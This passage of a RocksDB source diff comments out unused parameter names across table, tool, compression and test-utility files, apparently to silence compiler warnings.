SstFileWriterPropertiesCollector(version_, global_seqno_); } diff --git a/table/table_reader.h b/table/table_reader.h index 5f47468e6de..9f137dab18d 100644 --- a/table/table_reader.h +++ b/table/table_reader.h @@ -44,7 +44,7 @@ class TableReader { bool skip_filters = false) = 0; virtual InternalIterator* NewRangeTombstoneIterator( - const ReadOptions& read_options) { + const ReadOptions& /*read_options*/) { return nullptr; } @@ -63,7 +63,7 @@ class TableReader { virtual std::shared_ptr GetTableProperties() const = 0; // Prepare work that can be done before the real Get() - virtual void Prepare(const Slice& target) {} + virtual void Prepare(const Slice& /*target*/) {} // Report an approximation of how much memory has been used. virtual size_t ApproximateMemoryUsage() const = 0; @@ -95,7 +95,7 @@ class TableReader { } // convert db file to a human readable form - virtual Status DumpTable(WritableFile* out_file) { + virtual Status DumpTable(WritableFile* /*out_file*/) { return Status::NotSupported("DumpTable() not supported"); } diff --git a/table/table_test.cc b/table/table_test.cc index c55eb425576..a1f6a5b6e3f 100644 --- a/table/table_test.cc +++ b/table/table_test.cc @@ -66,9 +66,13 @@ class DummyPropertiesCollector : public TablePropertiesCollector { public: const char* Name() const { return ""; } - Status Finish(UserCollectedProperties* properties) { return Status::OK(); } + Status Finish(UserCollectedProperties* /*properties*/) { + return Status::OK(); + } - Status Add(const Slice& user_key, const Slice& value) { return Status::OK(); } + Status Add(const Slice& /*user_key*/, const Slice& /*value*/) { + return Status::OK(); + } virtual UserCollectedProperties GetReadableProperties() const { return UserCollectedProperties{}; @@ -79,7 +83,7 @@ class DummyPropertiesCollectorFactory1 : public TablePropertiesCollectorFactory { public: virtual TablePropertiesCollector* CreateTablePropertiesCollector( - TablePropertiesCollectorFactory::Context context) { + TablePropertiesCollectorFactory::Context /*context*/) { return new DummyPropertiesCollector(); } const char* Name() const { return "DummyPropertiesCollector1"; } @@ -89,7 +93,7 @@ class DummyPropertiesCollectorFactory2 : public TablePropertiesCollectorFactory { public: virtual TablePropertiesCollector* CreateTablePropertiesCollector( - TablePropertiesCollectorFactory::Context context) { + TablePropertiesCollectorFactory::Context /*context*/) { return new DummyPropertiesCollector(); } const char* Name() const { return "DummyPropertiesCollector2"; } @@ -207,11 +211,11 @@ class BlockConstructor: public Constructor { ~BlockConstructor() { delete block_; } - virtual Status FinishImpl(const Options& options, - const ImmutableCFOptions& ioptions, - const BlockBasedTableOptions& table_options, - const InternalKeyComparator& internal_comparator, - const stl_wrappers::KVMap& kv_map) override { + virtual Status FinishImpl( + const Options& /*options*/, const ImmutableCFOptions& /*ioptions*/, + const BlockBasedTableOptions& table_options, + const InternalKeyComparator& /*internal_comparator*/, + const stl_wrappers::KVMap& kv_map) override { delete block_; block_ = nullptr; BlockBuilder builder(table_options.block_restart_interval); @@ -305,7 +309,7 @@ class TableConstructor: public Constructor { virtual Status FinishImpl(const Options& options, const ImmutableCFOptions& ioptions, - const BlockBasedTableOptions& table_options, + const BlockBasedTableOptions& /*table_options*/, const InternalKeyComparator& internal_comparator, const stl_wrappers::KVMap& kv_map) override { Reset(); @@ -433,10 +437,11 @@ class MemTableConstructor: public Constructor { ~MemTableConstructor() { delete memtable_->Unref(); } - virtual Status FinishImpl(const Options&, const ImmutableCFOptions& ioptions, - const BlockBasedTableOptions& table_options, - const InternalKeyComparator& internal_comparator, - const stl_wrappers::KVMap& kv_map) override { + virtual Status FinishImpl( + const Options&, const ImmutableCFOptions& ioptions, + const BlockBasedTableOptions& /*table_options*/, + const InternalKeyComparator& /*internal_comparator*/, + const stl_wrappers::KVMap& kv_map) override { delete memtable_->Unref(); ImmutableCFOptions mem_ioptions(ioptions); memtable_ = new MemTable(internal_comparator_, mem_ioptions, @@ -499,11 +504,11 @@ class DBConstructor: public Constructor { ~DBConstructor() { delete db_; } - virtual Status FinishImpl(const Options& options, - const ImmutableCFOptions& ioptions, - const BlockBasedTableOptions& table_options, - const InternalKeyComparator& internal_comparator, - const stl_wrappers::KVMap& kv_map) override { + virtual Status FinishImpl( + const Options& /*options*/, const ImmutableCFOptions& /*ioptions*/, + const BlockBasedTableOptions& /*table_options*/, + const InternalKeyComparator& /*internal_comparator*/, + const stl_wrappers::KVMap& kv_map) override { delete db_; db_ = nullptr; NewDB(); @@ -665,7 +670,7 @@ class FixedOrLessPrefixTransform : public SliceTransform { return Slice(src.data(), prefix_len_); } - virtual bool InDomain(const Slice& src) const override { return true; } + virtual bool InDomain(const Slice& /*src*/) const override { return true; } virtual bool InRange(const Slice& dst) const override { return (dst.size() <= prefix_len_); @@ -795,7 +800,7 @@ class HarnessTest : public testing::Test { TestRandomAccess(rnd, keys, data); } - void TestForwardScan(const std::vector& keys, + void TestForwardScan(const std::vector& /*keys*/, const stl_wrappers::KVMap& data) { InternalIterator* iter = constructor_->NewIterator(); ASSERT_TRUE(!iter->Valid()); @@ -813,7 +818,7 @@ class HarnessTest : public testing::Test { } } - void TestBackwardScan(const std::vector& keys, + void TestBackwardScan(const std::vector& /*keys*/, const stl_wrappers::KVMap& data) { InternalIterator* iter = constructor_->NewIterator(); ASSERT_TRUE(!iter->Valid()); @@ -1528,7 +1533,7 @@ static std::string RandomString(Random* rnd, int len) { } void AddInternalKey(TableConstructor* c, const std::string& prefix, - int suffix_len = 800) { + int /*suffix_len*/ = 800) { static Random rnd(1023); InternalKey k(prefix + RandomString(&rnd, 800), 0, kTypeValue); c->Add(k.Encode().ToString(), "v"); @@ -2865,7 +2870,7 @@ class TestPrefixExtractor : public rocksdb::SliceTransform { return true; } - bool InRange(const rocksdb::Slice& dst) const override { return true; } + bool InRange(const rocksdb::Slice& /*dst*/) const override { return true; } bool IsValid(const rocksdb::Slice& src) const { if (src.size() != 4) { diff --git a/third-party/fbson/FbsonDocument.h b/third-party/fbson/FbsonDocument.h index 6fb8a93f171..fc7ca76ff38 100644 --- a/third-party/fbson/FbsonDocument.h +++ b/third-party/fbson/FbsonDocument.h @@ -355,7 +355,7 @@ class NumberValT : public FbsonValue { unsigned int numPackedBytes() const { return sizeof(FbsonValue) + sizeof(T); } // catch all unknow specialization of the template class - bool setVal(T value) { return false; } + bool setVal(T /*value*/) { return false; } private: T num_; diff --git a/tools/db_bench_tool.cc b/tools/db_bench_tool.cc index 0cc424eeab2..dfa00de5adc 100644 --- a/tools/db_bench_tool.cc +++ b/tools/db_bench_tool.cc @@ -235,7 +235,7 @@ DEFINE_bool(use_uint64_comparator, false, "use Uint64 user comparator"); DEFINE_int64(batch_size, 1, "Batch size"); -static bool ValidateKeySize(const char* flagname, int32_t value) { +static bool ValidateKeySize(const char* /*flagname*/, int32_t /*value*/) { return true; } @@ -2041,8 +2041,9 @@ class Benchmark { explicit ExpiredTimeFilter( const std::shared_ptr& timestamp_emulator) : timestamp_emulator_(timestamp_emulator) {} - bool Filter(int level, const Slice& key, const Slice& existing_value, - std::string* new_value, bool* value_changed) const override { + bool Filter(int /*level*/, const Slice& key, + const Slice& /*existing_value*/, std::string* /*new_value*/, + bool* /*value_changed*/) const override { return KeyExpired(timestamp_emulator_.get(), key); } const char* Name() const override { return "ExpiredTimeFilter"; } @@ -3351,12 +3352,9 @@ void VerifyDBFromDB(std::string& truth_db_name) { class KeyGenerator { public: - KeyGenerator(Random64* rand, WriteMode mode, - uint64_t num, uint64_t num_per_set = 64 * 1024) - : rand_(rand), - mode_(mode), - num_(num), - next_(0) { + KeyGenerator(Random64* rand, WriteMode mode, uint64_t num, + uint64_t /*num_per_set*/ = 64 * 1024) + : rand_(rand), mode_(mode), num_(num), next_(0) { if (mode_ == UNIQUE_RANDOM) { // NOTE: if memory consumption of this approach becomes a concern, // we can either break it into pieces and only random shuffle a section diff --git a/tools/ldb_cmd.cc b/tools/ldb_cmd.cc index 2cd4d94d112..1c02ef64026 100644 --- a/tools/ldb_cmd.cc +++ b/tools/ldb_cmd.cc @@ -111,7 +111,7 @@ LDBCommand* LDBCommand::InitFromCmdLineArgs( LDBCommand* LDBCommand::InitFromCmdLineArgs( const std::vector& args, const Options& options, const LDBOptions& ldb_options, - const std::vector* column_families, + const std::vector* /*column_families*/, const std::function& selector) { // --x=y command line arguments are added as x->y map entries in // parsed_params.option_map. @@ -456,7 +456,7 @@ std::vector LDBCommand::BuildCmdLineOptions( * updated. */ bool LDBCommand::ParseIntOption( - const std::map& options, + const std::map& /*options*/, const std::string& option, int& value, LDBCommandExecuteResult& exec_state) { std::map::const_iterator itr = @@ -486,7 +486,7 @@ bool LDBCommand::ParseIntOption( * Returns false otherwise. */ bool LDBCommand::ParseStringOption( - const std::map& options, + const std::map& /*options*/, const std::string& option, std::string* value) { auto itr = option_map_.find(option); if (itr != option_map_.end()) { @@ -764,7 +764,7 @@ bool LDBCommand::StringToBool(std::string val) { } CompactorCommand::CompactorCommand( - const std::vector& params, + const std::vector& /*params*/, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, false, @@ -834,7 +834,7 @@ const std::string DBLoaderCommand::ARG_BULK_LOAD = "bulk_load"; const std::string DBLoaderCommand::ARG_COMPACT = "compact"; DBLoaderCommand::DBLoaderCommand( - const std::vector& params, + const std::vector& /*params*/, const std::map& options, const std::vector& flags) : LDBCommand( @@ -950,7 +950,7 @@ void ManifestDumpCommand::Help(std::string& ret) { } ManifestDumpCommand::ManifestDumpCommand( - const std::vector& params, + const std::vector& /*params*/, const std::map& options, const std::vector& flags) : LDBCommand( @@ -1145,7 +1145,7 @@ const std::string InternalDumpCommand::ARG_STATS = "stats"; const std::string InternalDumpCommand::ARG_INPUT_KEY_HEX = "input_key_hex"; InternalDumpCommand::InternalDumpCommand( - const std::vector& params, + const std::vector& /*params*/, const std::map& options, const std::vector& flags) : LDBCommand( @@ -1284,7 +1284,7 @@ const std::string DBDumperCommand::ARG_STATS = "stats"; const std::string DBDumperCommand::ARG_TTL_BUCKET = "bucket"; DBDumperCommand::DBDumperCommand( - const std::vector& params, + const std::vector& /*params*/, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, true, @@ -1560,7 +1560,7 @@ const std::string ReduceDBLevelsCommand::ARG_PRINT_OLD_LEVELS = "print_old_levels"; ReduceDBLevelsCommand::ReduceDBLevelsCommand( - const std::vector& params, + const std::vector& /*params*/, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, false, @@ -1689,7 +1689,7 @@ const std::string ChangeCompactionStyleCommand::ARG_NEW_COMPACTION_STYLE = "new_compaction_style"; ChangeCompactionStyleCommand::ChangeCompactionStyleCommand( - const std::vector& params, + const std::vector& /*params*/, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, false, @@ -1826,7 +1826,7 @@ void ChangeCompactionStyleCommand::DoCommand() { namespace { struct StdErrReporter : public log::Reader::Reporter { - virtual void Corruption(size_t bytes, const Status& s) override { + virtual void Corruption(size_t /*bytes*/, const Status& s) override { std::cerr << "Corruption detected in log file " << s.ToString() << "\n"; } }; @@ -1990,7 +1990,7 @@ const std::string WALDumperCommand::ARG_PRINT_VALUE = "print_value"; const std::string WALDumperCommand::ARG_PRINT_HEADER = "header"; WALDumperCommand::WALDumperCommand( - const std::vector& params, + const std::vector& /*params*/, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, true, @@ -2074,7 +2074,7 @@ void GetCommand::DoCommand() { // ---------------------------------------------------------------------------- ApproxSizeCommand::ApproxSizeCommand( - const std::vector& params, + const std::vector& /*params*/, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, true, @@ -2190,7 +2190,7 @@ Options BatchPutCommand::PrepareOptionsForOpenDB() { // ---------------------------------------------------------------------------- -ScanCommand::ScanCommand(const std::vector& params, +ScanCommand::ScanCommand(const std::vector& /*params*/, const std::map& options, const std::vector& flags) : LDBCommand( @@ -2474,7 +2474,7 @@ const char* DBQuerierCommand::PUT_CMD = "put"; const char* DBQuerierCommand::DELETE_CMD = "delete"; DBQuerierCommand::DBQuerierCommand( - const std::vector& params, + const std::vector& /*params*/, const std::map& options, const std::vector& flags) : LDBCommand( @@ -2553,7 +2553,7 @@ void DBQuerierCommand::DoCommand() { // ---------------------------------------------------------------------------- CheckConsistencyCommand::CheckConsistencyCommand( - const std::vector& params, + const std::vector& /*params*/, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, false, BuildCmdLineOptions({})) {} @@ -2585,7 +2585,7 @@ void CheckConsistencyCommand::DoCommand() { const std::string CheckPointCommand::ARG_CHECKPOINT_DIR = "checkpoint_dir"; CheckPointCommand::CheckPointCommand( - const std::vector& params, + const std::vector& /*params*/, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, false /* is_read_only */, @@ -2623,7 +2623,7 @@ void CheckPointCommand::DoCommand() { // ---------------------------------------------------------------------------- -RepairCommand::RepairCommand(const std::vector& params, +RepairCommand::RepairCommand(const std::vector& /*params*/, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, false, BuildCmdLineOptions({})) {} @@ -2653,7 +2653,7 @@ const std::string BackupableCommand::ARG_BACKUP_DIR = "backup_dir"; const std::string BackupableCommand::ARG_STDERR_LOG_LEVEL = "stderr_log_level"; BackupableCommand::BackupableCommand( - const std::vector& params, + const std::vector& /*params*/, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, false /* is_read_only */, @@ -2831,7 +2831,7 @@ void DumpSstFile(std::string filename, bool output_hex, bool show_properties) { } // namespace DBFileDumperCommand::DBFileDumperCommand( - const std::vector& params, + const std::vector& /*params*/, const std::map& options, const std::vector& flags) : LDBCommand(options, flags, true, BuildCmdLineOptions({})) {} diff --git a/tools/ldb_tool.cc b/tools/ldb_tool.cc index e8229ef7b91..b09076ecc61 100644 --- a/tools/ldb_tool.cc +++ b/tools/ldb_tool.cc @@ -13,7 +13,7 @@ namespace rocksdb { LDBOptions::LDBOptions() {} void LDBCommandRunner::PrintHelp(const LDBOptions& ldb_options, - const char* exec_name) { + const char* /*exec_name*/) { std::string ret; ret.append(ldb_options.print_help_header); diff --git a/tools/sst_dump_tool.cc b/tools/sst_dump_tool.cc index 2a1729c7651..6110d5d5c40 100644 --- a/tools/sst_dump_tool.cc +++ b/tools/sst_dump_tool.cc @@ -110,9 +110,9 @@ Status SstFileReader::GetTableReader(const std::string& file_path) { } Status SstFileReader::NewTableReader( - const ImmutableCFOptions& ioptions, const EnvOptions& soptions, - const InternalKeyComparator& internal_comparator, uint64_t file_size, - unique_ptr* table_reader) { + const ImmutableCFOptions& /*ioptions*/, const EnvOptions& /*soptions*/, + const InternalKeyComparator& /*internal_comparator*/, uint64_t file_size, + unique_ptr* /*table_reader*/) { // We need to turn off pre-fetching of index and filter nodes for // BlockBasedTable shared_ptr block_table_factory = diff --git a/util/compression.h b/util/compression.h index 468b961fbfd..b75672f1438 100644 --- a/util/compression.h +++ b/util/compression.h @@ -151,8 +151,9 @@ inline std::string CompressionTypeToString(CompressionType compression_type) { // 2 -- Zlib, BZip2 and LZ4 encode decompressed size as Varint32 just before the // start of compressed block. Snappy format is the same as version 1. -inline bool Snappy_Compress(const CompressionOptions& opts, const char* input, - size_t length, ::std::string* output) { +inline bool Snappy_Compress(const CompressionOptions& /*opts*/, + const char* input, size_t length, + ::std::string* output) { #ifdef SNAPPY output->resize(snappy::MaxCompressedLength(length)); size_t outlen; @@ -381,10 +382,9 @@ inline char* Zlib_Uncompress(const char* input_data, size_t input_length, // block header // compress_format_version == 2 -- decompressed size is included in the block // header in varint32 format -inline bool BZip2_Compress(const CompressionOptions& opts, - uint32_t compress_format_version, - const char* input, size_t length, - ::std::string* output) { +inline bool BZip2_Compress(const CompressionOptions& /*opts*/, + uint32_t compress_format_version, const char* input, + size_t length, ::std::string* output) { #ifdef BZIP2 if (length > std::numeric_limits::max()) { // Can't compress more than 4GB @@ -520,7 +520,7 @@ inline char* BZip2_Uncompress(const char* input_data, size_t input_length, // header in varint32 format // @param compression_dict Data for presetting the compression library's // dictionary. -inline bool LZ4_Compress(const CompressionOptions& opts, +inline bool LZ4_Compress(const CompressionOptions& /*opts*/, uint32_t compress_format_version, const char* input, size_t length, ::std::string* output, const Slice compression_dict = Slice()) { @@ -705,15 +705,17 @@ inline bool LZ4HC_Compress(const CompressionOptions& opts, return false; } -inline bool XPRESS_Compress(const char* input, size_t length, std::string* output) { +inline bool XPRESS_Compress(const char* /*input*/, size_t /*length*/, + std::string* /*output*/) { #ifdef XPRESS return port::xpress::Compress(input, length, output); #endif return false; } -inline char* XPRESS_Uncompress(const char* input_data, size_t input_length, - int* decompress_size) { +inline char* XPRESS_Uncompress(const char* /*input_data*/, + size_t /*input_length*/, + int* /*decompress_size*/) { #ifdef XPRESS return port::xpress::Decompress(input_data, input_length, decompress_size); #endif diff --git a/util/delete_scheduler_test.cc b/util/delete_scheduler_test.cc index 208bdd74177..7d531244c6d 100644 --- a/util/delete_scheduler_test.cc +++ b/util/delete_scheduler_test.cc @@ -239,7 +239,7 @@ TEST_F(DeleteSchedulerTest, DisableRateLimiting) { int bg_delete_file = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::DeleteTrashFile:DeleteFile", - [&](void* arg) { bg_delete_file++; }); + [&](void* /*arg*/) { bg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); @@ -346,7 +346,7 @@ TEST_F(DeleteSchedulerTest, StartBGEmptyTrashMultipleTimes) { int bg_delete_file = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::DeleteTrashFile:DeleteFile", - [&](void* arg) { bg_delete_file++; }); + [&](void* /*arg*/) { bg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); rate_bytes_per_sec_ = 1024 * 1024; // 1 MB / sec @@ -381,7 +381,7 @@ TEST_F(DeleteSchedulerTest, DestructorWithNonEmptyQueue) { int bg_delete_file = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::DeleteTrashFile:DeleteFile", - [&](void* arg) { bg_delete_file++; }); + [&](void* /*arg*/) { bg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); rate_bytes_per_sec_ = 1; // 1 Byte / sec @@ -410,7 +410,7 @@ TEST_F(DeleteSchedulerTest, MoveToTrashError) { int bg_delete_file = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::DeleteTrashFile:DeleteFile", - [&](void* arg) { bg_delete_file++; }); + [&](void* /*arg*/) { bg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); rate_bytes_per_sec_ = 1024; // 1 Kb / sec @@ -436,10 +436,9 @@ TEST_F(DeleteSchedulerTest, DISABLED_DynamicRateLimiting1) { int fg_delete_file = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::DeleteTrashFile:DeleteFile", - [&](void* arg) { bg_delete_file++; }); + [&](void* /*arg*/) { bg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DeleteScheduler::DeleteFile", - [&](void* arg) { fg_delete_file++; }); + "DeleteScheduler::DeleteFile", [&](void* /*arg*/) { fg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::BackgroundEmptyTrash:Wait", [&](void* arg) { penalties.push_back(*(static_cast(arg))); }); @@ -518,9 +517,9 @@ TEST_F(DeleteSchedulerTest, ImmediateDeleteOn25PercDBSize) { int fg_delete_file = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::DeleteTrashFile:DeleteFile", - [&](void* arg) { bg_delete_file++; }); + [&](void* /*arg*/) { bg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DeleteScheduler::DeleteFile", [&](void* arg) { fg_delete_file++; }); + "DeleteScheduler::DeleteFile", [&](void* /*arg*/) { fg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); diff --git a/util/file_reader_writer_test.cc b/util/file_reader_writer_test.cc index dac5182452b..aa81992666a 100644 --- a/util/file_reader_writer_test.cc +++ b/util/file_reader_writer_test.cc @@ -26,9 +26,7 @@ TEST_F(WritableFileWriterTest, RangeSync) { size_ += data.size(); return Status::OK(); } - virtual Status Truncate(uint64_t size) override { - return Status::OK(); - } + virtual Status Truncate(uint64_t /*size*/) override { return Status::OK(); } Status Close() override { EXPECT_GE(size_, last_synced_ + kMb); EXPECT_LT(size_, last_synced_ + 2 * kMb); @@ -39,17 +37,21 @@ TEST_F(WritableFileWriterTest, RangeSync) { Status Flush() override { return Status::OK(); } Status Sync() override { return Status::OK(); } Status Fsync() override { return Status::OK(); } - void SetIOPriority(Env::IOPriority pri) override {} + void SetIOPriority(Env::IOPriority /*pri*/) override {} uint64_t GetFileSize() override { return size_; } - void GetPreallocationStatus(size_t* block_size, - size_t* last_allocated_block) override {} - size_t GetUniqueId(char* id, size_t max_size) const override { return 0; } - Status InvalidateCache(size_t offset, size_t length) override { + void GetPreallocationStatus(size_t* /*block_size*/, + size_t* /*last_allocated_block*/) override {} + size_t GetUniqueId(char* /*id*/, size_t /*max_size*/) const override { + return 0; + } + Status InvalidateCache(size_t /*offset*/, size_t /*length*/) override { return Status::OK(); } protected: - Status Allocate(uint64_t offset, uint64_t len) override { return Status::OK(); } + Status Allocate(uint64_t /*offset*/, uint64_t /*len*/) override { + return Status::OK(); + } Status RangeSync(uint64_t offset, uint64_t nbytes) override { EXPECT_EQ(offset % 4096, 0u); EXPECT_EQ(nbytes % 4096, 0u); @@ -119,12 +121,14 @@ TEST_F(WritableFileWriterTest, IncrementalBuffer) { Status Flush() override { return Status::OK(); } Status Sync() override { return Status::OK(); } Status Fsync() override { return Status::OK(); } - void SetIOPriority(Env::IOPriority pri) override {} + void SetIOPriority(Env::IOPriority /*pri*/) override {} uint64_t GetFileSize() override { return size_; } - void GetPreallocationStatus(size_t* block_size, - size_t* last_allocated_block) override {} - size_t GetUniqueId(char* id, size_t max_size) const override { return 0; } - Status InvalidateCache(size_t offset, size_t length) override { + void GetPreallocationStatus(size_t* /*block_size*/, + size_t* /*last_allocated_block*/) override {} + size_t GetUniqueId(char* /*id*/, size_t /*max_size*/) const override { + return 0; + } + Status InvalidateCache(size_t /*offset*/, size_t /*length*/) override { return Status::OK(); } bool use_direct_io() const override { return use_direct_io_; } @@ -174,13 +178,13 @@ TEST_F(WritableFileWriterTest, AppendStatusReturn) { explicit FakeWF() : use_direct_io_(false), io_error_(false) {} virtual bool use_direct_io() const override { return use_direct_io_; } - Status Append(const Slice& data) override { + Status Append(const Slice& /*data*/) override { if (io_error_) { return Status::IOError("Fake IO error"); } return Status::OK(); } - Status PositionedAppend(const Slice& data, uint64_t) override { + Status PositionedAppend(const Slice& /*data*/, uint64_t) override { if (io_error_) { return Status::IOError("Fake IO error"); } diff --git a/util/slice.cc b/util/slice.cc index 8d95a8ae19d..eed59657f86 100644 --- a/util/slice.cc +++ b/util/slice.cc @@ -74,7 +74,7 @@ class CappedPrefixTransform : public SliceTransform { return Slice(src.data(), std::min(cap_len_, src.size())); } - virtual bool InDomain(const Slice& src) const override { return true; } + virtual bool InDomain(const Slice& /*src*/) const override { return true; } virtual bool InRange(const Slice& dst) const override { return (dst.size() <= cap_len_); @@ -93,11 +93,11 @@ class NoopTransform : public SliceTransform { virtual Slice Transform(const Slice& src) const override { return src; } - virtual bool InDomain(const Slice& src) const override { return true; } + virtual bool InDomain(const Slice& /*src*/) const override { return true; } - virtual bool InRange(const Slice& dst) const override { return true; } + virtual bool InRange(const Slice& /*dst*/) const override { return true; } - virtual bool SameResultWhenAppended(const Slice& prefix) const override { + virtual bool SameResultWhenAppended(const Slice& /*prefix*/) const override { return false; } }; diff --git a/util/testutil.cc b/util/testutil.cc index f3010f3f2c0..5164101441d 100644 --- a/util/testutil.cc +++ b/util/testutil.cc @@ -107,12 +107,12 @@ class Uint64ComparatorImpl : public Comparator { } } - virtual void FindShortestSeparator(std::string* start, - const Slice& limit) const override { + virtual void FindShortestSeparator(std::string* /*start*/, + const Slice& /*limit*/) const override { return; } - virtual void FindShortSuccessor(std::string* key) const override { + virtual void FindShortSuccessor(std::string* /*key*/) const override { return; } }; diff --git a/util/testutil.h b/util/testutil.h index 02bfb0ff6d2..069b883f285 100644 --- a/util/testutil.h +++ b/util/testutil.h @@ -121,10 +121,10 @@ class SimpleSuffixReverseComparator : public Comparator { return -(suffix_a.compare(suffix_b)); } } - virtual void FindShortestSeparator(std::string* start, - const Slice& limit) const override {} + virtual void FindShortestSeparator(std::string* /*start*/, + const Slice& /*limit*/) const override {} - virtual void FindShortSuccessor(std::string* key) const override {} + virtual void FindShortSuccessor(std::string* /*key*/) const override {} }; // Returns a user key comparator that can be used for comparing two uint64_t @@ -255,7 +255,8 @@ class RandomRWStringSink : public RandomRWFile { return Status::OK(); } - Status Read(uint64_t offset, size_t n, Slice* result, char* scratch) const { + Status Read(uint64_t offset, size_t n, Slice* result, + char* /*scratch*/) const { *result = Slice(nullptr, 0); if (offset < ss_->contents_.size()) { size_t str_res_sz = @@ -376,7 +377,7 @@ class StringSource: public RandomAccessFile { class NullLogger : public Logger { public: using Logger::Logv; - virtual void Logv(const char* format, va_list ap) override {} + virtual void Logv(const char* /*format*/, va_list /*ap*/) override {} virtual size_t GetLogFileSize() const override { return 0; } }; @@ -457,15 +458,16 @@ class FilterNumber : public CompactionFilter { std::string last_merge_operand_key() { return last_merge_operand_key_; } - bool Filter(int level, const rocksdb::Slice& key, const rocksdb::Slice& value, - std::string* new_value, bool* value_changed) const override { + bool Filter(int /*level*/, const rocksdb::Slice& /*key*/, + const rocksdb::Slice& value, std::string* /*new_value*/, + bool* /*value_changed*/) const override { if (value.size() == sizeof(uint64_t)) { return num_ == DecodeFixed64(value.data()); } return true; } - bool FilterMergeOperand(int level, const rocksdb::Slice& key, + bool FilterMergeOperand(int /*level*/, const rocksdb::Slice& key, const rocksdb::Slice& value) const override { last_merge_operand_key_ = key.ToString(); if (value.size() == sizeof(uint64_t)) { @@ -563,7 +565,7 @@ class StringEnv : public EnvWrapper { // The following text is boilerplate that forwards all methods to target() Status NewSequentialFile(const std::string& f, unique_ptr* r, - const EnvOptions& options) override { + const EnvOptions& /*options*/) override { auto iter = files_.find(f); if (iter == files_.end()) { return Status::NotFound("The specified file does not exist", f); @@ -571,13 +573,13 @@ class StringEnv : public EnvWrapper { r->reset(new SeqStringSource(iter->second)); return Status::OK(); } - Status NewRandomAccessFile(const std::string& f, - unique_ptr* r, - const EnvOptions& options) override { + Status NewRandomAccessFile(const std::string& /*f*/, + unique_ptr* /*r*/, + const EnvOptions& /*options*/) override { return Status::NotSupported(); } Status NewWritableFile(const std::string& f, unique_ptr* r, - const EnvOptions& options) override { + const EnvOptions& /*options*/) override { auto iter = files_.find(f); if (iter != files_.end()) { return Status::IOError("The specified file already exists", f); @@ -585,8 +587,8 @@ class StringEnv : public EnvWrapper { r->reset(new StringSink(&files_[f])); return Status::OK(); } - virtual Status NewDirectory(const std::string& name, - unique_ptr* result) override { + virtual Status NewDirectory(const std::string& /*name*/, + unique_ptr* /*result*/) override { return Status::NotSupported(); } Status FileExists(const std::string& f) override { @@ -595,21 +597,21 @@ class StringEnv : public EnvWrapper { } return Status::OK(); } - Status GetChildren(const std::string& dir, - std::vector* r) override { + Status GetChildren(const std::string& /*dir*/, + std::vector* /*r*/) override { return Status::NotSupported(); } Status DeleteFile(const std::string& f) override { files_.erase(f); return Status::OK(); } - Status CreateDir(const std::string& d) override { + Status CreateDir(const std::string& /*d*/) override { return Status::NotSupported(); } - Status CreateDirIfMissing(const std::string& d) override { + Status CreateDirIfMissing(const std::string& /*d*/) override { return Status::NotSupported(); } - Status DeleteDir(const std::string& d) override { + Status DeleteDir(const std::string& /*d*/) override { return Status::NotSupported(); } Status GetFileSize(const std::string& f, uint64_t* s) override { @@ -621,24 +623,25 @@ class StringEnv : public EnvWrapper { return Status::OK(); } - Status GetFileModificationTime(const std::string& fname, - uint64_t* file_mtime) override { + Status GetFileModificationTime(const std::string& /*fname*/, + uint64_t* /*file_mtime*/) override { return Status::NotSupported(); } - Status RenameFile(const std::string& s, const std::string& t) override { + Status RenameFile(const std::string& /*s*/, + const std::string& /*t*/) override { return Status::NotSupported(); } - Status LinkFile(const std::string& s, const std::string& t) override { + Status LinkFile(const std::string& /*s*/, const std::string& /*t*/) override { return Status::NotSupported(); } - Status LockFile(const std::string& f, FileLock** l) override { + Status LockFile(const std::string& /*f*/, FileLock** /*l*/) override { return Status::NotSupported(); } - Status UnlockFile(FileLock* l) override { return Status::NotSupported(); } + Status UnlockFile(FileLock* /*l*/) override { return Status::NotSupported(); } protected: std::unordered_map files_; @@ -661,14 +664,14 @@ class ChanglingMergeOperator : public MergeOperator { void SetName(const std::string& name) { name_ = name; } - virtual bool FullMergeV2(const MergeOperationInput& merge_in, - MergeOperationOutput* merge_out) const override { + virtual bool FullMergeV2(const MergeOperationInput& /*merge_in*/, + MergeOperationOutput* /*merge_out*/) const override { return false; } - virtual bool PartialMergeMulti(const Slice& key, - const std::deque& operand_list, - std::string* new_value, - Logger* logger) const override { + virtual bool PartialMergeMulti(const Slice& /*key*/, + const std::deque& /*operand_list*/, + std::string* /*new_value*/, + Logger* /*logger*/) const override { return false; } virtual const char* Name() const override { return name_.c_str(); } @@ -689,8 +692,9 @@ class ChanglingCompactionFilter : public CompactionFilter { void SetName(const std::string& name) { name_ = name; } - bool Filter(int level, const Slice& key, const Slice& existing_value, - std::string* new_value, bool* value_changed) const override { + bool Filter(int /*level*/, const Slice& /*key*/, + const Slice& /*existing_value*/, std::string* /*new_value*/, + bool* /*value_changed*/) const override { return false; } @@ -713,7 +717,7 @@ class ChanglingCompactionFilterFactory : public CompactionFilterFactory { void SetName(const std::string& name) { name_ = name; } std::unique_ptr CreateCompactionFilter( - const CompactionFilter::Context& context) override { + const CompactionFilter::Context& /*context*/) override { return std::unique_ptr(); } diff --git 